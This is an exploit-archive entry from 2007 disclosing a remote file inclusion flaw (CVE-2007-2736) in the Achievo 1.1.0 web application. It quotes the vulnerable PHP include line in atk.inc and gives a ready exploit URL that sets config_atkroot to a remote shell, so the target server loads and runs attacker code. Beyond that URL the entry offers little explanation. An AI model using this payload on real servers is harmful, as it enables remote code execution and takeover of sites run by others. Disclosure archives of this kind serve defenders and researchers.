Achievo 1.1.0 - 'config_atkroot' Remote File Inclusion

Related Vulnerabilities: CVE-2007-2736  
Publish Date: 15 May 2007
Author: Katatafish
                ## Achievo 1.1.0(index.php) Remote File Include Vulnerability ##

#Found by : Katatafish (karatatata@hush.com)

#Download http://www.achievo.org/files/achievo-stable-1.1.0.tar.gz

# File: ./atk.inc
 include_once($config_atkroot."atk/modules/class.atkmodule.inc");

# Exploit http://site.com/[path]/index.php?config_atkroot=SHELL

# milw0rm.com [2007-05-15]